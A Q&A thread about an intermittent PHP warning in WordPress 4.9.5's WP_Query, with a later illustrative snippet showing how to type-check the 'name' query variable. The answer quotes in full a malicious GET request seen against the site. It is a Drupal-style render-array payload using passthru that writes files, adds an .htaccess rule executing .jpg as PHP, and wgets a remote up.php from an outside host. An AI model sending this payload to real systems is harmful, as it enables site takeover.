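WordPress 4.9.5: intermittent PHP warning "trim() expects parameter 1 to be string, array given"

Date: 2018-05-24 Author: crmpicco

I am running WordPress 4.9.5 and occasionally see the following error in my logs.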

E_WARNING: trim() expects parameter 1 to be string, array given

The stack trace is shown below, so it is not coming from custom theme code.

in trim called at /var/www/wordpress/html/wp-includes/class-wp-query.php (736)
…::parse_query called at /var/www/wordpress/html/wp-includes/class-wp-query.php (1621)
…ry::get_posts called at /var/www/wordpress/html/wp-includes/class-wp-query.php (3230)
in WP_Query::query called at /var/www/wordpress/html/wp-includes/class-wp.php (599)
in WP::query_posts called at /var/www/wordpress/html/wp-includes/class-wp.php (715)
in WP::main called at /var/www/wordpress/html/wp-includes/functions.php (960)
in wp called at /var/www/wordpress/html/wp-blog-header.php (16)
in require called at /var/www/wordpress/html/index.php (17)

Is this a known/unknown WordPress bug, and is there a fix?

1 answer

SO user: conner_bw

I ran into this today. It is a bug. I filed a bug report here:

https://core.trac.wordpress.org/ticket/46797

The problem is this line of code:

$qv['name'] = trim( $qv['name'] );

Source: https://github.com/WordPress/wordpress-develop/blob/a0ca5afd8977b5a3857084d9cb1bd345166e2f21/src/wp-includes/class-wp-query.php#L764

A (malicious) user sends a request like this:

GET /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo "Vuln!! patch it Now!" > vuln.htm; echo "Vuln!!"> sites/default/files/vuln.php; echo "Vuln!!"> vuln.php; cd sites/default/files/; echo "AddType application/x-httpd-php .jpg" > .htaccess; wget 'http://40k.waszmann.de/Deutsch/images/up.php'

A request like this makes $qv['name'] an array instead of a string.

It needs to be sanitized.
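
An added example (not part of the original answer and not WordPress core code): it shows how PHP's bracket syntax turns the `name` query parameter into an array, and how a type check before `trim()` avoids the warning. The helper name `safe_query_string_var` and the sample query strings are constructed for illustration.

```php
<?php
// Added illustration; sample query strings below are constructed.

/**
 * Hypothetical helper: return the trimmed value of a query var,
 * or '' when it is missing or non-scalar (e.g. sent as name[]=...).
 */
function safe_query_string_var( array $qv, string $key ): string {
    if ( ! isset( $qv[ $key ] ) || ! is_scalar( $qv[ $key ] ) ) {
        return '';
    }
    return trim( (string) $qv[ $key ] );
}

$samples = array(
    'name=%20hello-world%20',           // ordinary slug with stray spaces
    'name[%23type]=markup&name[x][]=a', // bracket syntax: 'name' becomes an array
    'p=1',                              // 'name' not supplied at all
);

foreach ( $samples as $query ) {
    // parse_str() applies the same bracket-to-array rules PHP uses for $_GET.
    parse_str( $query, $qv );
    $raw = $qv['name'] ?? null;

    // Passing $raw straight to trim() would raise the E_WARNING from the
    // question when $raw is an array (a TypeError on PHP 8 and later).
    printf(
        "%-36s raw type: %-6s sanitized: '%s'\n",
        $query,
        gettype( $raw ),
        safe_query_string_var( $qv, 'name' )
    );
}
```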
